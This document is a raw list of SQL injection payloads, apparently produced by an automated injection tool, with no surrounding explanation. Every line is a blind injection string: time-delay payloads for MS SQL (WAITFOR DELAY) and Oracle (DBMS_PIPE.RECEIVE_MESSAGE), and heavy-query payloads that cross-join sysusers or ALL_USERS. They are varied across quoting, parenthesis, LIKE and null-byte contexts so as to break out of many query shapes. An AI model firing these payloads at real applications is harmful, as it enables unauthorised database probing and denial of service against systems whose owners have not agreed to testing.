) WHERE 3386=3386 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
' WHERE 3725=3725 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
" WHERE 9862=9862 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
 WHERE 7855=7855 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
'||(SELECT 'Kjkr' FROM DUAL WHERE 9675=9675 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
'||(SELECT 'rjIb' WHERE 8186=8186 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
'+(SELECT FxxP WHERE 8260=8260 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
'+(SELECT 'AzZs' WHERE 8582=8582 AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
' IN BOOLEAN MODE) AND 4856=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
-3838
-4345) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-1221') OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-2251' OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-2926" OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-9827) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (4059=4059
-6940)) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((4894=4894
-6765))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (((7493=7493
-3544 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-7085') OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('QOkC'='QOkC
-3184')) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('pEJC'='pEJC
-3084'))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('NuhN'='NuhN
-8247' OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'BEMI'='BEMI
-7237') OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('BJmO' LIKE 'BJmO
-4069')) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('fzsw' LIKE 'fzsw
-4825'))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('sILD' LIKE 'sILD
-9792' OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'HUWw' LIKE 'HUWw
-8916") OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ("lCKX"="lCKX
-6359")) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (("WoyE"="WoyE
-9022"))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((("pFvO"="pFvO
-2746" OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND "IBWe"="IBWe
-8071") OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ("RMwh" LIKE "RMwh
-1590")) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (("bsFL" LIKE "bsFL
-1413"))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((("PiOl" LIKE "PiOl
-2600" OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND "hzof" LIKE "hzof
-4588%') OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('%'='
-2247%')) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (('%'='
-5174%'))) OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ((('%'='
-1172%' OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='
-4149%00') OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('Srgm'='Srgm
-4707%00' OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Kwal'='Kwal
-9354') WHERE 2607=2607 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
-3953") WHERE 6585=6585 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
-5314) WHERE 8852=8852 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
-8573' WHERE 9148=9148 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
-6265" WHERE 4411=4411 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
-3888 WHERE 6076=6076 OR 8354=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) -- 
(SELECT (CASE WHEN (3478=3478) THEN WAITFOR DELAY '0:0:15' ELSE 3478*(SELECT 3478 FROM master..sysdatabases) END))
(SELECT (CASE WHEN (5570=5570) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 5570 END))
,(SELECT (CASE WHEN (3167=3167) THEN WAITFOR DELAY '0:0:15' ELSE 3167*(SELECT 3167 FROM master..sysdatabases) END))
,(SELECT (CASE WHEN (6785=6785) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 6785*(SELECT 6785 FROM master..sysdatabases) END))
) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (4751=4751
)) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((9726=9726
))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (((7867=7867
 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15)
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('zLYd'='zLYd
')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('gqhC'='gqhC
'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('HGye'='HGye
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'ekKA'='ekKA
') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('rHrN' LIKE 'rHrN
')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('KOma' LIKE 'KOma
'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('garS' LIKE 'garS
' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'YlCs' LIKE 'YlCs
") AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ("KQWV"="KQWV
")) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (("hMXd"="hMXd
"))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((("UfYM"="UfYM
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND "fGtE"="fGtE
") AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ("pxNJ" LIKE "pxNJ
")) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (("SHCH" LIKE "SHCH
"))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((("giwr" LIKE "giwr
" AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND "LGlv" LIKE "LGlv
%') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('%'='
%')) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND (('%'='
%'))) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ((('%'='
%' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND '%'='
%00') AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND ('gjLH'='gjLH
%00' AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) AND 'EAPs'='EAPs
') WHERE 6282=6282 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
") WHERE 1055=1055 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
) WHERE 1633=1633 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
' WHERE 4091=4091 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
" WHERE 9587=9587 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
 WHERE 9131=9131 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) -- 
'||(SELECT 'ImTI' FROM DUAL WHERE 8628=8628 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )||'
'||(SELECT 'dcUk' WHERE 7272=7272 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )||'
'+(SELECT tCiT WHERE 6279=6279 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )+'
'+(SELECT 'rOmg' WHERE 7513=7513 AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) )+'
' IN BOOLEAN MODE) AND 3515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(111)||CHR(100)||CHR(73),15) #
) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
" AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
)) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
')) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
") AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
")) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
"))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%')) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%'))) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%00') AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
%00' AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
') WHERE 4786=4786 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
") WHERE 8988=8988 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
) WHERE 6090=6090 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' WHERE 6408=6408 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
" WHERE 8052=8052 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
 WHERE 3808=3808 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'||(SELECT 'DEBH' FROM DUAL WHERE 2216=2216 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'||(SELECT 'DKUc' WHERE 2744=2744 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'+(SELECT ghcQ WHERE 7538=7538 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
'+(SELECT 'rBcr' WHERE 9616=9616 AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
' IN BOOLEAN MODE) AND 4317=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(101)||CHR(118)||CHR(119),15)--
) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (7890=7890
)) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((2135=2135
))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((9778=9778
 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('DdOX'='DdOX
')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('wNgu'='wNgu
'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('EBcy'='EBcy
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'HNJp'='HNJp
') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('YUaw' LIKE 'YUaw
')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('nAPi' LIKE 'nAPi
'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('ettW' LIKE 'ettW
' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'muaY' LIKE 'muaY
") AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("kwei"="kwei
")) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("Ufwl"="Ufwl
"))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("jtQj"="jtQj
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "nFkr"="nFkr
") AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ("NlLM" LIKE "NlLM
")) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (("qbpx" LIKE "qbpx
"))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((("Pows" LIKE "Pows
" AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND "GHsA" LIKE "GHsA
%') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('%'='
%')) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('%'='
%'))) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('%'='
%' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='
%00') AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('RYgZ'='RYgZ
%00' AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'bWGv'='bWGv
') WHERE 3398=3398 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
") WHERE 1385=1385 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
) WHERE 1850=1850 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
' WHERE 2733=2733 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
" WHERE 3530=3530 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
 WHERE 2620=2620 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) -- 
'||(SELECT 'ZwWp' FROM DUAL WHERE 6843=6843 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )||'
'||(SELECT 'GQlt' WHERE 4942=4942 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )||'
'+(SELECT bgZx WHERE 2195=2195 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )+'
'+(SELECT 'qYFM' WHERE 5110=5110 AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) )+'
' IN BOOLEAN MODE) AND 8528=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) #
) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
' AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
" AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
)) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
 AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
')) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
'))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
") AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
")) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
"))) AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
%') AND 3107=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--
